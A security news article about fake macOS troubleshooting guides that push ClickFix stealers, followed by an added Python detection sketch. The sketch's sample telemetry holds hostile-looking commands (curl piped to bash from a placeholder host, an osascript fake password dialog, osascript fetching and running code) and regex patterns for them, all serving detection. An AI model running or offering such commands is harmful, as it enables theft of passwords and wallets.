Fake macOS guides trick users into installing ClickFix malware

Since late 2025, attackers have posted fake macOS guides that tell users to paste Terminal commands that install ClickFix malware to steal iCloud data, saved passwords and crypto wallet keys, Microsoft reports.

Microsoft’s Defender Security Research Team reported that since late 2025 attackers have posted fake macOS troubleshooting guides on platforms including Medium, Craft and Squarespace. The pages present fixes for common Mac problems and instruct readers to copy a single command into Terminal; that command downloads and executes a script that installs malware called ClickFix.

Because victims run the command directly in Terminal, macOS Gatekeeper does not inspect the downloaded code. Gatekeeper normally checks code signing and notarization for apps opened through Finder; the ClickFix technique shifts execution to the user and bypasses those bundle checks.

Researchers identified three related components used in the campaign (a loader, a script and a helper) that work together to harvest data, establish persistence and send stolen information to attacker-controlled servers. Malware families observed in infections include AMOS, Macsync and SHub Stealer. Infected machines are searched for iCloud and Telegram credentials, saved usernames and passwords in Chrome and Firefox, private documents and photos under 2 megabytes, and cryptocurrency wallet keys from apps such as Exodus, Ledger and Trezor.

After installation the malware displays a fake dialog requesting the system password to install a helper tool. If the user provides credentials, attackers gain broad access to files and system settings. In some cases researchers found legitimate wallet applications removed and replaced with trojanized versions that monitor transactions and enable theft.

Parts of the campaign use native macOS utilities such as curl and osascript to pull and run code directly in memory, reducing reliance on disk files and complicating detection by standard antivirus products. Investigators also observed a built-in kill switch: the loader halts if it detects a Russian keyboard layout.
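The three behaviours described above (a pasted Terminal command that pipes a download into an interpreter, an osascript dialog asking for the system password, and osascript pulling code with curl so nothing touches disk) all leave a trace in process-execution telemetry, which is where a defender can catch them even though Gatekeeper never sees the code. The following is an added detection sketch, not code from Microsoft or from the campaign; it scans constructed process records modelled on what an EDR or the macOS unified log would emit. The rule names, the `ProcessEvent` shape and the sample command lines are assumptions made for this example, and the keyboard-layout kill switch is deliberately not covered because it is not a process-log signal.

```python
"""Detection sketch for ClickFix-style Terminal abuse on macOS.

Added example (not from the article or the reported campaign). It matches
command lines against three patterns taken from the article's description:
a remote download piped into an interpreter, an osascript password dialog,
and osascript running a shell command that fetches remote content.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-execution record (hypothetical shape, modelled on EDR output)."""
    pid: int
    parent: str      # name of the parent process
    cmdline: str     # full command line of the new process


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    severity: str
    from_terminal: bool   # parent is an interactive terminal, i.e. a pasted command


# Interpreters the article's technique feeds a remote script into.
_SINK = r"(?:(?:ba|z|da)?sh|osascript)"

RULES = (
    # `curl ... | bash` style: download piped straight into an interpreter.
    # Only the first pipe after curl/wget is examined; chained pipes are a known gap.
    ("download_piped_to_interpreter", "high",
     re.compile(rf"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?{_SINK}\b")),
    # osascript showing a dialog with a hidden answer field, i.e. a password
    # prompt like the fake "install a helper tool" request described above.
    ("osascript_password_dialog", "high",
     re.compile(r"\bosascript\b.*display dialog.*hidden answer", re.IGNORECASE)),
    # osascript running a shell command that itself fetches remote content:
    # execution stays in memory, leaving no file for Gatekeeper to assess.
    ("osascript_shell_with_download", "medium",
     re.compile(r"\bosascript\b.*do shell script.*\b(?:curl|wget)\b", re.IGNORECASE)),
)

# Parent names that indicate a user typed or pasted the command themselves.
TERMINALS = {"Terminal", "iTerm2", "Alacritty", "kitty", "WezTerm"}


def scan(events):
    """Return one Finding per (event, rule) match, in input order."""
    findings = []
    for ev in events:
        for name, severity, pattern in RULES:
            if pattern.search(ev.cmdline):
                findings.append(Finding(ev.pid, name, severity, ev.parent in TERMINALS))
    return findings


# Constructed sample telemetry; hosts under example.invalid are placeholders.
SAMPLE_EVENTS = (
    ProcessEvent(101, "Terminal",
                 '/bin/zsh -c "curl -fsSL https://guides.example.invalid/fix.sh | bash"'),
    ProcessEvent(102, "bash",
                 "osascript -e 'display dialog \"macOS needs your password to install "
                 "a helper tool\" default answer \"\" with hidden answer'"),
    ProcessEvent(103, "Terminal", "curl -s https://www.example.invalid/"),      # benign fetch
    ProcessEvent(104, "Finder", "osascript -e 'display notification \"Build finished\"'"),
    ProcessEvent(105, "bash",
                 "osascript -e 'do shell script \"curl -s https://guides.example.invalid/stage2 | sh\"'"),
)


def main():
    for f in scan(SAMPLE_EVENTS):
        origin = "pasted into a terminal" if f.from_terminal else "spawned by a script"
        print(f"pid {f.pid}: {f.rule} [{f.severity}] ({origin})")


if __name__ == "__main__":
    main()
```

The `from_terminal` flag is the useful triage hint here: a download piped into bash whose parent is Terminal is exactly the "user pasted a fix from a guide" shape, while the same pattern under a non-interactive parent points at a later stage of the chain. Running the block prints findings for pids 101, 102 and 105; the benign fetch and the notification dialog are not flagged.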

Security researchers reported other operations that reuse the ClickFix-style social engineering. One operation targeted fintech and crypto developers on macOS with fake meeting invitations. A separate supply-chain intrusion introduced a malicious npm package into a crypto trading project through an AI-generated code change, allowing attackers to harvest wallet data and system secrets.

The activity has been active since late 2025 and focuses on macOS users searching online for troubleshooting help.
